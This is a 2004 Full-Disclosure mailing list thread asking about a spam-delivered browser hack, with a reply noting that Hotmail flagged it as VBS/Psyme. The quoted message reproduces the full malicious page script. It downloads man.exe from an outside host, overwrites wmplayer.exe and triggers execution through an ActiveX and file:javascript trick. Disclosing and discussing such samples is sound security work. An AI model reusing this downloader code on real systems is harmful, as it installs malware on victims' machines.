[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <009c01c3ea13$fc59af00$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Old Hack?
hrm i got this bounce back from hotmail when i emailed back
Attachment Details:-
Attachment Name: N/A
File: Infected.msg
Infected? Yes
Repaired? No
Blocked? No
Deleted? No
Virus Name: VBS/Psyme
^^^ theres your virus name apartly..., even tho i scanned it with sweep
(sophos) and it didnt pick ne thing up.
----- Original Message -----
From: "axid3j1al axid3j1al" <axid3j1al@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-Disclosure] Old Hack?
> Has anyone see this little code injection hack.
>
> Is this old?
>
>
> Email has subject line "congranulations! you won $1169"
>
> with body
>
> http://sinaraevent.com/bbs/zipcode/6.htm
>
>
> and code
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
> result = '';
> lines = code.split(/\r\n/);
> for (i=0;i<lines.length;i++) {
>
> line = lines[i];
> line = line.replace(/^\s+/,"");
> line = line.replace(/\s+$/,"");
> line = line.replace(/'/g,"\\'");
> line = line.replace(/[\\]/g,"\\\\");
> line = line.replace(/[/]/g,"%2f");
>
> if (line != '') {
> result += line +'\\r\\n';
> }
> }
> return result;
> }
>
> function doit() {
> mycode = preparecode(document.all.code.value);
> myURL = "file:javascript:eval('" + mycode + "')";
> window.open(myURL,"_media")
> }
>
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
>
> </script>
>
> braindwish has expired
>
> _________________________________________________________________
> Hot chart ringtones and polyphonics. Go to
> http://ninemsn.com.au/mobilemania/default.asp
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists